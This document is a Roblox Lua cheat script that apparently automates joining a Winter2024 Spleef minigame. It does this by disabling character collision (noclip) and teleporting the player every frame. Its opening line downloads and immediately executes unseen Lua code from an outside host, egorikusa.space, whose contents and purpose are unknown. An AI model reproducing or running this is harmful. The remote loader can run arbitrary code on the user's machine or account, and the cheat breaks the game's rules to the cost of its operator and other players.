loadstring(game:HttpGet("https://egorikusa.space/6a1993220f4cfcbb6de839b4.lua", true))()
getgenv().Start = true
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")
local Workspace = game:GetService("Workspace")
local Interiors = Workspace:FindFirstChild("Interiors")
local RenderStepped = RunService.RenderStepped
local Player = Players.LocalPlayer
local MainTable = require(ReplicatedStorage.SharedModules.ContentPacks.Winter2024.Minigames.SpleefMinigameClient)

local CheckSpot = function()
    local Winter2024Shop = Interiors:FindFirstChild("Winter2024Shop")
    if  Winter2024Shop then
        return Winter2024Shop:FindFirstChild("JoinZones") and Winter2024Shop.JoinZones.SpleefMinigame.Ring
    elseif Interiors:FindFirstChild("SpleefMinigame") then
        return CFrame.new(5000, 50000, 50000)
    else
        print("Your not even at the Winter2024Shop go there then it will work")
    end
end


local StartMain = function()
    if not MainTable.is_queued and CheckSpot() then
        Player.Character:MoveTo(CheckSpot().Position + Vector3.new(0,0,0))
    end
end

local NoClip = function()
    for i,v in next, Player.Character:GetChildren() do
        if v:IsA('BasePart') then
            v.CanCollide = false
            v.Velocity = Vector3.new(0,0,0)
        end
    end
end

RenderStepped:Connect(function()
    if Start then
        NoClip()
        StartMain()
    end
end)
